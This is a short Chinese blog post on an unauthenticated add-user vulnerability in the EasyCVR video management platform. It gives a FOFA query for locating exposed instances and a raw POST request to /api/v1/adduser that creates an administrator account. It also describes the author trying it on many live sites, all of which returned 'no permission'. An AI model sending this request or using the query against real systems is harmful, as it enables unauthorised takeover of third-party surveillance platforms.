EasyCVR视频管理平台存在任意用户添加漏洞

漏洞描述

攻击者可以通过发送特定的POST请求,利用未授权访问的接口'/api/v1/adduser',在系统中添加任意用户,并将其设置为管理员角色。

fofa

app="EasyCVR-视频管理平台"

poc

password为md5加密

POST /api/v1/adduser HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

漏洞复现

fofa中搜索资产,共有493条数据匹配

image-20240525183329277

访问目标网站进行抓包

image-20240525183406680

image-20240525192843522

构造数据包之后,返回的内容是没有权限操作,目标做了鉴权或者系统为最新版本,已无该漏洞

一连找了好多个站点,均返回没有权限操作

posted @   LeouMaster  阅读(86)  评论(0编辑  收藏  举报
相关博文:
·  JEEVMS仓库管理系统任意文件读取漏洞
·  CrushFTP服务器端模板注入
·  视频融合平台EasyCVR用户管理模块添加用户出现异常提示的问题修复
·  EasyCVR 视频管理平台存在鉴别信息泄露
·  【操作教程】视频监控系统EasyCVR视频汇聚管理平台如何添加用户和角色?
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
AI IDE Trae